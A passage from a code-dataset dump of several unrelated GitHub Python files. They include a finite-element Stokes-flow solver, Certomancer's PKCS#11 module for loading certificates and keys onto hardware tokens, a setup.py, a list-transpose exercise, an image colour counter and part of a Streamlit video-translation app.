i+1,i+2,i+5*(2**N)+1,i+5*(2**N)+2,i+5*(2**N)+3,i+4*2*(2**N)+2,i+4*2*(2**N)+3,i+4*2*(2**N)+4])\n            el = [lin,sq]\n            elements.append(el)\n            lin_vec = np.concatenate((lin_vec,lin))\n        else:\n            lin = np.asarray([i,i+2,i+2*3*(2**N)+2,i+2*3*(2**N)+4])\n            sq = np.asarray([i,i+1,i+2,i+3*(2**N)+1,i+3*(2**N)+2,i+3*(2**N)+3,i+2*3*(2**N)+2,i+2*3*(2**N)+3,i+2*3*(2**N)+4])\n            el = [lin,sq]\n            elements.append(el)\n            lin_vec = np.concatenate((lin_vec,lin))\n        i += 2\n        if i == ti + 3*(2**N):\n            if r == 1:\n                i += 5*(2**N)+2\n                r += 2\n                ti = i\n            else:\n                i += 3*(2**N)+2\n                r += 2\n                ti = i\n    return elements, np.array(list(set(lin_vec)),dtype=int)\n\nN =3\n\nx = np.linspace(0,1,int(5*(2**N)+1))\ny = np.linspace(0,1,int(5*(2**N)+1))\nX,Y = np.meshgrid(x,y)\n\npx = X.ravel()\npy = Y.ravel()\norigpts = np.vstack((px,py)).T\n\n#points = origpts[np.logical_or(origpts[:,1] <.20005,np.logical_and(origpts[:,1] <.40005,origpts[:,0] <.60005))]\n#points[:,0] = 1 - points[:,0]\n#elements,lin_set = typeSixDom(points,N)\n#non_homog_dir,homog_dir,neumann = typeSixBdry(points,N)\n\n#define the basis functions\nphi = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y + c[i][3]*x*y + c[i][4]*(x**2) + c[i][5]*(y**2) + c[i][6]*(x**2)*y + c[i][7]*x*(y**2) +c[i][8]*(x**2)*(y**2)\nphi_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y + 2*c[i][4]*x + 2*c[i][6]*x*y + c[i][7]*(y**2) + 2*c[i][8]*x*(y**2)\nphi_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x + 2*c[i][5]*y + c[i][6]*(x**2) + 2*c[i][7]*x*y+ 2*c[i][8]*(x**2)*y\n\nzeta = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y +c[i][3]*x*y\nzeta_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y\nzeta_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x\n\na_bilin = lambda x,y,c,i,j: (phi_dx(x,y,c,j)*phi_dx(x,y,c,i) + phi_dy(x,y,c,j)*phi_dy(x,y,c,i))\nb_bilin_x = lambda x,y,c1,c2,i,j: -phi_dx(x,y,c2,j)*zeta(x,y,c1,i)\nb_bilin_y = lambda x,y,c1,c2,i,j: -phi_dy(x,y,c2,j)*zeta(x,y,c1,i)\n\n#generate nodes, elements, edges and interior nodes\nN = 4\n#domain type: 0, 1, 2, 3, 4, 5\ntyp = 6\npoints,elements,lin_set,non_homog,homog,neu,inner = createDomain(N,typ)\n\n#build the stiffness and divergence matrices\n
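# (editor's note, assumption) createA/createD are assumed to assemble the global\n# stiffness and divergence matrices by integrating the bilinear forms a_bilin and\n# b_bilin_* over each element; they are defined elsewhere in this project.\n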
A = createA(a_bilin,points,elements)\nDx = createD(b_bilin_x,points,elements)\nDy = createD(b_bilin_y,points,elements)\n\n#define the lifting function\ny_n = points[non_homog][:,1]\n\nrg = 100*(y_n)*(0.4-y_n)\n\n#remove the necessary rows and columns\nAi = matrixShaver(A,inner,inner)\nDxi = matrixShaver(Dx,lin_set,inner)\nDyi = matrixShaver(Dy,lin_set,inner)\nGx = matrixShaver(Dx,lin_set,non_homog)\nG = matrixShaver(A,inner,non_homog)\n\n#assemble the right-hand side\nfx = -G@rg\nfy = np.zeros_like(fx)\nfp = -Gx@rg\nrhs = np.concatenate((fx,fy,fp))\n\n#assemble the block matrix and solve\nBlock = sp.bmat([[Ai,None,Dxi.T],[None,Ai,Dyi.T],[Dxi,Dyi,None]]).tocsr()\nu_bar = solver(Block,rhs)\nux,uy,p = solHelper(u_bar,rg,inner,points,non_homog)\n\n#generate triangulation and mask for easier plotting \ntri1 = plotHelp(points,N,1)\ntri2 = plotHelp(points[lin_set],N-1,1)\n\n\n#figure 0, domain\nplt.figure()\nplotElements(points,elements)\nplt.title('Domain w/bilinear and biquadratic elements')\nplt.axis('scaled')\nplt.savefig(\"figur0_type\"+str(typ), dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n#figure 1, velocity field and pressure\ncontourPlotter(p,tri2,title = \"Velocity and pressure\",save = False)\nquiverPlotter(ux[lin_set],uy[lin_set],points[lin_set],fname=\"figur1_type\"+str(typ), newfig = False)\n#figure 2, x-velocity\ncontourPlotter(ux,tri1,title=\"x-velocity, $u_x$\",fname=\"figur2_type\"+str(typ))\n#figure 3, y-velocity\ncontourPlotter(uy,tri1,title=\"y-velocity, $u_y$\",fname=\"figur3_type\"+str(typ))\n#figure 4, velocity magnitude\ncontourPlotter(np.sqrt(ux**2 + uy**2),tri1,title=\"Velocity-magnitude, $|u|$\",fname=\"figur4_type\"+str(typ))\n#figure 5, velocity field\nquiverPlotter(ux,uy,points,fname=\"figur5_type\"+str(typ),title= \"Velocity-field\")\n#figure 6, pressure\ncontourPlotter(p,tri2,title=\"Pressure, p\",fname=\"figur6_type\"+str(typ))\n\nplt.close('all')\n\n\n#plt.figure()\n#plotElements(points,elements)\n#plt.title('Domain w/bilinear and biquadratic elements')\n#for i,p in enumerate(points):\n#    plt.annotate(i,p)\n#plt.axis('scaled')\n#plt.savefig(\"aaa_type\"+str(1), dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n\n'''\n\n'''\nif something:\n    points_list = np.asarray(points_list)\n    i = 0\n    for S,points in zip(S_mat,points_list):\n        tri1 = plotHelp(points,N,1)\n        vel_mag = np.sqrt(S[:len(points)]**2 + S[len(points):2*len(points)]**2)\n        press = S[2*len(points):]\n        tri2 = plotHelp(points[lin_set],N,1)\n        contourPlotter(vel_mag,tri1,title = \"Velocity magnitude\",fname = \"vel_\"+str(i))\n        contourPlotter(press,tri2,title = \"Pressure\",fname = \"press_\"+str(i))\n        plt.close('all')\n        i += 1\n\n\n    J1 = [mu[0]+1,2*mu[2] +1]\n    J2 = [1,2*mu[2] +1]\n    J3 = [mu[1]+1,2*mu[2] +1]\n    J4 = [mu[0]+1,1]\n    J5 = [mu[1]+1,1]\n    J6 = J1\n    J7 = J2\n    J8 = J3\n\n    Js = [J1,J2,J3,J4,J5,J6,J7,J8]\n    q1,q2,q3,q4 = [],[],[],[]\n\n    for J in Js:\n        q1.append(J[1]/J[0])\n        q2.append(J[0]/J[1])\n        q3.append(J[1])\n        q4.append(J[0])\n\n\n    #cond1 = points[:,0] < .45\n    # cond2 = points[:,0] > .55\n    # cond3 = points[:,1] > .15\n    #cond4 = points[:,1] < .05\n    #points[cond1,0] = mu3*(points[cond1,0]-.45) + points[cond1,0]\n    #points[cond2,0] = mu4*(points[cond2,0]-.55) + points[cond2,0]\n    #points[cond3,1] = mu5*2*(points[cond3,1]-.15) + points[cond3,1]\n    #points[cond4,1] = mu5*2*(points[cond4,1]-.05) + points[cond4,1]\n\n    if __name__ != \"__main__\":\n        #variables: 
mu1 is the amplitude of the velocity profile, mu2 is the dynamic viscosity\n        mu1 = 150\n        mu2 = 10\n        mu3 = 0\n        mu4 = 0\n        mu5 = 2\n\n        #define the basis functions\n        phi = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y + c[i][3]*x*y + c[i][4]*(x**2) + c[i][5]*(y**2) + c[i][6]*(x**2)*y + c[i][7]*x*(y**2) +c[i][8]*(x**2)*(y**2)\n        phi_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y + 2*c[i][4]*x + 2*c[i][6]*x*y + c[i][7]*(y**2) + 2*c[i][8]*x*(y**2)\n        phi_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x + 2*c[i][5]*y + c[i][6]*(x**2) + 2*c[i][7]*x*y+ 2*c[i][8]*(x**2)*y\n\n        zeta = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y +c[i][3]*x*y\n        zeta_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y\n        zeta_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x\n\n        a_bilin = lambda x,y,c,i,j: (1/mu1)*(phi_dx(x,y,c,j)*phi_dx(x,y,c,i) + phi_dy(x,y,c,j)*phi_dy(x,y,c,i))\n        b_bilin_x = lambda x,y,c1,c2,i,j: -phi_dx(x,y,c2,j)*zeta(x,y,c1,i)\n        b_bilin_y = lambda x,y,c1,c2,i,j: -phi_dy(x,y,c2,j)*zeta(x,y,c1,i)\n\n        #generate nodes, elements, edges and interior nodes\n        N = 4\n        #domain type: 0, 1, 2, 3, 4, 5\n        typ = 5\n        points,elements,lin_set,non_homog,homog,neu,inner = createDomain(N,typ)\n\n        for el in elements:\n            print(points[el[1][4]])\n\n        o1 = [0,.45]\n        o2 = [.55,1]\n        o3 = [.45,.55,.05,.15]\n        #o1 = [0,.4]\n        #o2 = [.4,.6]\n        #o3 = [.6,1]\n\n        cond1 = points[:,0] < o1[1]\n        cond2 = points[:,0] > o2[0]\n        cond3 = points[:,1] > o3[3]\n        cond4 = points[:,1] < o3[2]\n\n        points[cond1,0] = mu3*(points[cond1,0]-.45) + points[cond1,0]\n        points[cond2,0] = mu4*(points[cond2,0]-.55) + points[cond2,0]\n        points[cond3,1] = mu5*2*(points[cond3,1]-.15) + points[cond3,1]\n        points[cond4,1] = mu5*2*(points[cond4,1]-.05) + points[cond4,1]\n\n        #domain 0\n        #cond1 = np.logical_and(points[:,0] >= o1[0],points[:,0] < o1[1])\n        #cond2 = np.logical_and(points[:,0] >= o2[0],points[:,0] < o2[1])\n        #cond3 = np.logical_and(points[:,0] >= o3[0],points[:,0] <= o3[1])\n\n        #domain 0\n        #points[cond1,1] = mu3*(points[cond1,1]-.1) + points[cond1,1]\n        #points[cond2,1] = mu3*5*(o2[1]-points[cond2,0])*(points[cond2,1]-.1) + mu4*5*(points[cond2,0]-o2[0])*(points[cond2,1]-.1) + points[cond2,1]\n        #points[cond3,1] = mu4*(points[cond3,1]-.1) + points[cond3,1]\n\n        #build the stiffness and divergence matrices\n        A = createA(a_bilin,points,elements)\n        Dx = createD(b_bilin_x,points,elements)\n        Dy = createD(b_bilin_y,points,elements)\n\n        #define the lifting function\n        y_n = points[non_homog][:,1]\n\n        rg = mu2*((y_n+mu5*.1)*((mu5*.2)+.2-(y_n+mu5*.1)))/(0.2*mu5)\n\n        #remove the necessary rows and columns\n        Ai = matrixShaver(A,inner,inner)\n        Dxi = matrixShaver(Dx,lin_set,inner)\n        Dyi = matrixShaver(Dy,lin_set,inner)\n        Gx = matrixShaver(Dx,lin_set,non_homog)\n        G = matrixShaver(A,inner,non_homog)\n\n        #assemble the right-hand side\n        fx = -G@rg\n        fy = np.zeros_like(fx)\n        fp = -Gx@rg\n        rhs = np.concatenate((fx,fy,fp))\n\n        #assemble the block matrix and solve\n        Block = sp.bmat([[Ai,None,Dxi.T],[None,Ai,Dyi.T],[Dxi,Dyi,None]]).tocsr()\n        u_bar = solver(Block,rhs)\n        ux,uy,p = solHelper(u_bar,rg,inner,points,non_homog)\n\n        print(\"total out volumeflow\")\n        if typ == 2:\n            print(sum(np.sqrt(ux[neu]**2 + uy[neu]**2))/len(neu)*(.2+.2*mu5))\n        else:\n            print(sum(np.sqrt(ux[neu]**2+uy[neu]**2))/len(neu)*(.2+.2*mu5))\n        print(\"total in volumeflow\")\n        print(sum(np.sqrt(ux[non_homog]**2 + uy[non_homog]**2))/len(non_homog)*(.2+.2*mu5))\n\n        #generate triangulation and mask for easier plotting \n        tri1 = plotHelp(points,N,mu4+mu5)\n        tri2 = plotHelp(points[lin_set],N-1,mu4+mu5)\n        \n\n        #figure 0, domain\n        plt.figure()\n        plotElements(points,elements)\n        
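# (editor's note) figure 0 renders the deformed mesh; this whole block sits inside a\n        # triple-quoted string and is never executed\n        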
plt.title('Domain w/bilinear and biquadratic elements')\n        plt.axis('scaled')\n        plt.savefig(\"figur0_type\"+str(typ), dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n        #figure 1, velocity field and pressure\n        contourPlotter(p,tri2,title = \"Velocity and pressure\",save = False)\n        quiverPlotter(ux[lin_set],uy[lin_set],points[lin_set],fname=\"figur1_type\"+str(typ), newfig = False)\n        #figure 2, x-velocity\n        contourPlotter(ux,tri1,title=\"x-velocity, $u_x$\",fname=\"figur2_type\"+str(typ))\n        #figure 3, y-velocity\n        contourPlotter(uy,tri1,title=\"y-velocity, $u_y$\",fname=\"figur3_type\"+str(typ))\n        #figure 4, velocity magnitude\n        contourPlotter(np.sqrt(ux**2 + uy**2),tri1,title=\"Velocity-magnitude, $|u|$\",fname=\"figur4_type\"+str(typ))\n        #figure 5, velocity field\n        quiverPlotter(ux,uy,points,fname=\"figur5_type\"+str(typ),title= \"Velocity-field\")\n        #figure 6, pressure\n        contourPlotter(p,tri2,title=\"Pressure, p\",fname=\"figur6_type\"+str(typ))\n\n        plt.close('all')\n'''\n\na = np.asarray([i for i in range(100)])\nb = [3,5,7,10,12,16]\nmask = np.ones(len(a), bool)\nmask[b] = 0\na_new = a[mask]\n\ntest = np.asarray([[0,-1],[1,0]])\n\npoint = np.asarray([[3,10],[3,10],[3,10],[3,10],[3,10]])\n\nfor i in range(len(point)):\n    point[i] = test@point[i]\n\nprint(point)\n\n\nprint(a[b])\nprint(a_new)\n","repo_name":"Hansi77/Master","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":37494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"14806834784","text":"from typing import Any, Dict, List, Optional, Set, Tuple\n\nimport pkcs11\nfrom asn1crypto import core, keys, x509\nfrom pkcs11.util import biginteger, dsa, rsa\nfrom pkcs11.util import x509 as p11_x509\n\nfrom certomancer import PKIArchitecture\nfrom certomancer.registry import CertLabel\n\n__all__ = [\n    'Alchemist',\n    'AlchemistBackend',\n    'DefaultAlchemistBackend',\n    'open_pkcs11_session',\n]\n\n\nclass AlchemistBackend:\n    \"\"\"\n    Alchemist backend to interface with a hardware token.\n    \"\"\"\n\n    def private_key_to_token(\n        self,\n        key: keys.PrivateKeyInfo,\n        label: str,\n        id_attr: bytes,\n        attrs: Optional[Dict[pkcs11.Attribute, Any]] = None,\n    ):\n        \"\"\"\n        Save a private key on the token.\n\n        :param key:\n            Private key to save.\n        :param label:\n            PKCS#11 label to set.\n        :param id_attr:\n            PKCS#11 ID attribute to set.\n        :param attrs:\n            Additional PKCS#11 attributes.\n        \"\"\"\n        raise NotImplementedError\n\n    def cert_to_token(\n        self,\n        cert: x509.Certificate,\n        label: str,\n        id_attr: bytes,\n        attrs: Optional[Dict[pkcs11.Attribute, Any]] = None,\n    ):\n        \"\"\"\n        Save a certificate on the token.\n\n        :param cert:\n            Certificate to save.\n        :param label:\n            PKCS#11 label to set.\n        :param id_attr:\n            PKCS#11 ID attribute to set.\n        :param attrs:\n            Additional PKCS#11 attributes.\n        \"\"\"\n        raise NotImplementedError\n\n\ndef open_pkcs11_session(\n    lib_location: str,\n    slot_no: Optional[int] = None,\n    token_label: Optional[str] = None,\n    pin: Optional[str] = None,\n    as_so: bool = False,\n    rw: bool = True,\n) -> pkcs11.Session:\n    \"\"\"\n    Open a PKCS#11 session\n\n    :param lib_location:\n        Path to the PKCS#11 module.\n    :param slot_no:\n        Slot number to use. If not specified, the first slot containing a token\n        labelled ``token_label`` will be used.\n    :param token_label:\n        Label of the token to use. 
If ``None``, there is no constraint.\n    :param pin:\n        User PIN to use.\n    :param as_so:\n        Pass PIN as SO pin instead of user pin.\n    :param rw:\n        Open the token in read-write mode (defaults to ``True``).\n    :return:\n        An open PKCS#11 session object.\n    \"\"\"\n    lib = pkcs11.lib(lib_location)\n\n    slots = lib.get_slots()\n    token = None\n    if slot_no is None:\n        for slot in slots:\n            try:\n                token = slot.get_token()\n                if token_label is None or token.label == token_label:\n                    break\n            except pkcs11.PKCS11Error:\n                continue\n        if token is None:\n            raise pkcs11.PKCS11Error(\n                f'No token with label {token_label} found'\n                if token_label is not None\n                else 'No token found'\n            )\n    else:\n        token = slots[slot_no].get_token()\n        if token_label is not None and token.label != token_label:\n            raise pkcs11.PKCS11Error(\n                f'Token in slot {slot_no} is not {token_label}.'\n            )\n\n    kwargs: Dict[str, Any]\n    kwargs = {'rw': rw}\n    if pin is not None:\n        kwargs['so_pin' if as_so else 'user_pin'] = pin\n\n    return token.open(**kwargs)\n\n\nclass DefaultAlchemistBackend(AlchemistBackend):\n    def __init__(self, session: pkcs11.Session):\n        self._session = session\n\n    def private_key_to_token(\n        self,\n        key: keys.PrivateKeyInfo,\n        label: str,\n        id_attr: bytes,\n        attrs: Optional[Dict[pkcs11.Attribute, Any]] = None,\n    ):\n        algo = key.algorithm\n        obj_attrs = {}\n        if algo == 'rsa':\n            key_bytes = bytes(key['private_key'])\n            obj_attrs.update(\n                rsa.decode_rsa_private_key(key_bytes, pkcs11.MechanismFlag(0))\n            )\n        elif algo == 'ec':\n            ec_key: keys.ECPrivateKey = key['private_key'].parsed\n            params = ec_key['parameters']\n            if params is core.VOID:\n                params = key['private_key_algorithm']['parameters']\n            obj_attrs.update(\n                {\n                    pkcs11.Attribute.KEY_TYPE: pkcs11.KeyType.EC,\n                    pkcs11.Attribute.EC_PARAMS: params.dump(),\n                    pkcs11.Attribute.VALUE: ec_key['private_key'].contents,\n                }\n            )\n        elif algo == 'dsa':\n            obj_attrs = dsa.decode_dsa_domain_parameters(\n                key['private_key_algorithm']['parameters'].dump()\n            )\n            obj_attrs[pkcs11.Attribute.VALUE] = biginteger(\n                key['private_key'].parsed.native\n            )\n            obj_attrs[pkcs11.Attribute.KEY_TYPE] = pkcs11.KeyType.DSA\n        elif algo in ('ed25519', 'ed448'):\n            # we encode the params using the RFC 8032 curve name convention\n            # See 2.3.6 in the PKCS #11 3.0 current mechanisms specification\n            params = core.PrintableString(\n                'edwards25519' if algo == 'ed25519' else 'edwards448'\n            )\n            obj_attrs.update(\n                {\n                    pkcs11.Attribute.KEY_TYPE: pkcs11.KeyType.EC_EDWARDS,\n                    pkcs11.Attribute.EC_PARAMS: params.dump(),\n                    pkcs11.Attribute.VALUE: key['private_key'].parsed.native,\n                }\n            )\n        else:\n            raise NotImplementedError(f\"Algorithm {algo!r} is not supported\")\n\n        obj_attrs[pkcs11.Attribute.SIGN] = True\n        obj_attrs[pkcs11.Attribute.TOKEN] = True\n        obj_attrs[pkcs11.Attribute.LABEL] = label\n        obj_attrs[pkcs11.Attribute.CLASS] = pkcs11.ObjectClass.PRIVATE_KEY\n        obj_attrs[pkcs11.Attribute.ID] = id_attr\n        obj_attrs[pkcs11.Attribute.EXTRACTABLE] = False\n        obj_attrs[pkcs11.Attribute.SENSITIVE] = True\n        if attrs:\n            obj_attrs.update(attrs)\n        self._session.create_object(obj_attrs)\n\n    def cert_to_token(\n        self,\n        cert: x509.Certificate,\n        label: str,\n        id_attr: bytes,\n        attrs: Optional[Dict[pkcs11.Attribute, Any]] = None,\n    ):\n        obj_attrs = p11_x509.decode_x509_certificate(cert.dump())\n        obj_attrs[pkcs11.Attribute.TOKEN] = True\n        obj_attrs[pkcs11.Attribute.LABEL] = label\n        obj_attrs[pkcs11.Attribute.ID] = id_attr\n        if attrs:\n            obj_attrs.update(attrs)\n        self._session.create_object(obj_attrs)\n\n\nclass Alchemist:\n    \"\"\"\n    The Alchemist is a tool 
to move Certomancer's PKI architectures onto\n    PKCS#11 tokens.\n\n    :param backend:\n        The backend implementation to use.\n    :param pki_arch:\n        The PKI architecture to interact with.\n    \"\"\"\n\n    def __init__(self, backend: AlchemistBackend, pki_arch: PKIArchitecture):\n        self._backend = backend\n        self.pki_arch = pki_arch\n\n    def _get_key_bundle_for(\n        self, lbl: CertLabel\n    ) -> Tuple[str, x509.Certificate, keys.PrivateKeyInfo]:\n        arch = self.pki_arch\n        spec = arch.get_cert_spec(lbl)\n        cert = arch.get_cert(lbl)\n        key = self.pki_arch.key_set.get_private_key(spec.subject_key)\n        return str(lbl), cert, key\n\n    def store_key_bundles(\n        self, certs: Set[CertLabel], include_chains: bool = True\n    ):\n        \"\"\"\n        Store key-certificate pairs from a :class:`.PKIArchitecture` on\n        a PKCS#11 token.\n\n        The PKCS#11 label and ID attributes for both the keys and\n        the certificates will be assigned based on the certificate's label\n        in the Certomancer config.\n\n        Note that private keys with multiple associated certificates will not\n        be deduplicated.\n\n        :param certs:\n            The set of certificate labels for which both the certificates\n            and the corresponding private keys should be installed on the token.\n        :param include_chains:\n            If ``True`` (the default), also save certificates relevant to the\n            ``certs``' chain of trust.\n\n            .. note::\n                The private keys for these certificates will not be saved.\n        \"\"\"\n\n        extra_cert_lbls: Set[CertLabel]\n        if include_chains:\n            extra_cert_lbls = {\n                iss_lbl\n                for lbl in certs\n                for iss_lbl in self.pki_arch.get_chain(lbl)\n            }\n        else:\n            extra_cert_lbls = set()\n\n        # make sure there's no overlap in writes\n        extra_cert_lbls -= certs\n\n        # make sure we have all the info we need before doing any writes,\n        # so we get the errors out of the way before making any hard-to-reverse\n        # changes on the actual token\n        bundles: List[Tuple[str, x509.Certificate, keys.PrivateKeyInfo]] = [\n            self._get_key_bundle_for(lbl) for lbl in certs\n        ]\n        extra_certs: List[Tuple[str, x509.Certificate]] = [\n            (str(lbl), self.pki_arch.get_cert(lbl)) for lbl in extra_cert_lbls\n        ]\n\n        for cert_lbl, cert in extra_certs:\n            self._backend.cert_to_token(\n                cert=cert, label=cert_lbl, id_attr=cert_lbl.encode('utf8')\n            )\n\n        for bundle_lbl, cert, priv_key in bundles:\n            bundle_id = bundle_lbl.encode('utf8')\n            self._backend.cert_to_token(\n                cert=cert, label=bundle_lbl, id_attr=bundle_id\n            )\n            # Note: this will duplicate private keys for which\n            # more than one certificate has been issued.\n            # We don't dedupe by default because some PKCS#11 client\n            # implementations make assumptions about labels & ids\n            # to pair up keys and certs, but it might be good to\n            # support that use case as well (?)\n            self._backend.private_key_to_token(\n                key=priv_key, label=bundle_lbl, id_attr=bundle_id\n            )\n","repo_name":"MatthiasValvekens/certomancer","sub_path":"certomancer/integrations/alchemist.py","file_name":"alchemist.py","file_ext":"py","file_size_in_byte":9871,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"60"}
{"seq_id":"3570828600","text":"from os.path import abspath, dirname, join\nfrom setuptools import setup, find_packages\n\n\nartifactory_repo_name = 'robotfw_core_resources'\n# line below is replaced by script in Jenkins - LEAVE IT\nartifactory_version = 'DEV'\n\nCURDIR = dirname(abspath(__file__))\n\n\ndef get_requirements():\n    requirements = []\n    with open(join(CURDIR, 'requirements.txt')) as f:\n        for line in f.readlines():\n            line = line.strip()\n            # Remove empty lines and 
comment lines\n            if line and not line.startswith('#'):\n                requirements.append(line)\n    return requirements\n\ndef get_packages():\n    return find_packages(exclude=['doc', 'imgs', 'test'])\n\n\nsetup(\n    name=artifactory_repo_name,\n    version=artifactory_version,\n    dependency_links=['https://artifacts.werally.in/artifactory/api/pypi/pypi-release/simple'],\n    maintainer='Core QA',\n    maintainer_email='core-qa@rallyhealth.com',\n    install_requires=['robotfw_resources'] + get_requirements(),\n    packages=get_packages(),\n    package_dir={'': '.'},\n    include_package_data=True,\n    zip_safe=False,\n    description='Accounts Robot Framework Resources',\n    url='https://github.com/AudaxHealthInc/Core-AutomatedTests/SharedLibrary',\n)\n","repo_name":"rally-conner/gizmo","sub_path":"shared_library/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"22182798804","text":"import time\n\nif __name__==\"__main__\":\n    a=[\n        [1,2,3,4],\n        [5,6,7,8],\n        [9,10,11,12]\n    ]\n    '''create a pivot list where rows will be converted to columns \n    and columns will be converted to rows; here the output will be\n    [\n    [1,5,9],\n    [2,6,10],\n    [3,7,11],\n    [4,8,12]\n    ]'''\n\n    #my logic\n    '''b= [\n        [row[0][0],row[1][0],row[2][0]],\n        [row[0][1],row[1][1],row[2][1]],\n        [row[0][2],row[1][2],row[2][2]],\n        [row[0][3],row[1][3],row[2][3]]\n    ]\n    for i in range(0,column-1,1)\n        for j in range(0,row-1,1)\n            row[j][i]\n    '''\n\n    start_time=time.time()\n    b=list()\n    for i in range(0, len(a[0]) , 1):\n        row=list()\n        for j in range(0, len(a) , 1):\n            row.append(a[j][i])\n        b.append(row)\n    print(b)\n    total_time=time.time()-start_time\n    print(\"total time taken by method1 is->\")\n    print(total_time)\n\n    #now using comprehension\n    start_time=time.time()\n    b1=[[a[j][i] for j in range(len(a))] for i in range(len(a[0]))] #first method\n    print(b1)\n    total_time=time.time()-start_time\n    print(\"total time taken by method2 is->\")\n    print(total_time)\n\n    start_time=time.time()\n    b2=[[row[i] for row in a] for i in range(len(a[0]))]#simpler method\n    print(b2)\n    total_time=time.time()-start_time\n    print(\"total time taken by method3 is->\")\n    print(total_time)\n\n    #From the performance it is clear that the last method is the fastest","repo_name":"Tanusree-Das/python-practice-exercises","sub_path":"code-base/nestedListComprehension.py","file_name":"nestedListComprehension.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"21120595657","text":"from PIL import Image\nfrom numpy import average, round\nimport colorsys\nimport time\n\nstart_time = time.clock()\n\n# returns most used color in image\ndef color_comp():\n    print(\"File name?\")\n    filename = input(\"\")\n\n    def color_in_img(img):\n        # Convert HSV to degrees/percentages/percentages\n        def hue(pixel):\n            return round(pixel[0]*360, 1)\n\n        def saturation(pixel):\n            return round(pixel[1]*100, 1)\n\n        def value(pixel):\n            return round(pixel[2]/255*100, 1)\n\n        # Bounds for colors, ranges decided with:\n        # http://www.workwithcolor.com/red-color-hue-range-01.htm\n        #def redval(pixel):\n        #    if hue(pixel) >= 346 or (hue(pixel) >= 0 and hue(pixel) <= 20):\n        #        return True\n\n        #def orangeval(pixel):\n        #    if hue(pixel) >= 11 and hue(pixel) <= 50:\n        #        return True\n\n        #def yellowval(pixel):\n        #    if hue(pixel) >= 41 and hue(pixel) <= 80:\n        #        return True\n\n        #def greenval(pixel):\n        #    if hue(pixel) >= 61 and hue(pixel) <= 169:\n        
# return True\n\n #def cyanval(pixel):\n # if hue(pixel) >= 141 and hue(pixel) <= 220:\n # return True\n\n #def blueval(pixel):\n # if hue(pixel) >= 201 and hue(pixel) <= 280:\n # return True\n\n def purpleval(pixel):\n if hue(pixel) >= 241 and hue(pixel) <= 330:\n return True\n\n #def pinkval(pixel):\n # if hue(pixel) >= 321 and hue(pixel) <= 355:\n # return True\n\n valuedict = {\"purple\": purpleval}\n\n valuecount = {\"purple\": 0}\n\n try:\n im = Image.open(img, 'r')\n width, height = im.size\n pixel_values = list(im.getdata())\n\n color_data = []\n for pixel in pixel_values:\n color_data.append(colorsys.rgb_to_hsv(*pixel))\n\n for pixel in color_data:\n if saturation(pixel) == 0:\n continue\n if saturation(pixel) == 100 and value(pixel) == 0:\n continue\n for color in valuedict:\n if valuedict[color](pixel):\n valuecount[color] += 1\n\n color_most = max(valuecount, key=valuecount.get)\n return color_most + \" is the most used color, composing \" \\\n + str(int(round(valuecount[color_most]/len(pixel_values)*100))) \\\n + \"% of the image\"\n\n except FileNotFoundError:\n return \"Error: file <\" + filename + \"> not found\"\n\n return color_in_img(filename)\n\n# select ImageColorSort mode\ndef mode_select():\n mode_dict = {\"color comp\": color_comp}\n\n print(\"Select a mode.\")\n for key in mode_dict:\n print(key)\n mode = input(\"\")\n\n try:\n return mode_dict[mode]()\n except KeyError:\n return \"Error: <\" + mode + \"> not a valid mode\"\n\nprint(mode_select())\n\nprint(\"Runtime: \", time.clock() - start_time, \"seconds\")\n","repo_name":"brandonhudavid/ImageColorSort","sub_path":"sourcecode/old/ImageColorSort_v1-purple.py","file_name":"ImageColorSort_v1-purple.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71647207230","text":"import os\r\nimport pathlib\r\nimport streamlit as st\r\nimport tempfile\r\nimport time\r\nfrom interpreter import video_to_video\r\nfrom helper import split_video, merge_video\r\n\r\ndef get_video_download(video_file):\r\n with open(video_file, 'rb') as video:\r\n return video.read()\r\n\r\n\r\ndef translate_video():\r\n video_file = st.file_uploader(\r\n label=\"Select a video file to transcribe and translate\",\r\n type=[\"mp4\", \"avi\", \"mov\"],\r\n accept_multiple_files=False)\r\n\r\n if video_file:\r\n ext = pathlib.Path(video_file.name).suffix\r\n with tempfile.NamedTemporaryFile(suffix=ext) as tmp_file:\r\n tmp_file.write(video_file.read())\r\n \r\n a = time.time()\r\n with tempfile.TemporaryDirectory() as tempdir:\r\n video_file = tmp_file.name\r\n save_dir = f'{tempdir}/vchunks'\r\n chunk_dir = f'{tempdir}/trans_chunks'\r\n _, video_name = split_video(video_file, save_dir)\r\n\r\n\r\n # translate video chunks\r\n for i, vchunk in enumerate(sorted(os.listdir(save_dir))):\r\n start = time.time()\r\n video_to_video(f'{save_dir}/{vchunk}', chunk_dir)\r\n end = time.time() - start\r\n st.write(f'Translated chunk {i+1} in {end}s.')\r\n\r\n # merge translated videos together\r\n translated_video = merge_video(video_name, chunk_dir, prefix='fr')\r\n\r\n time_spent = time.time() - a\r\n\r\n if not translate_video:\r\n st.write(\"We could not process your video, sorry.\")\r\n 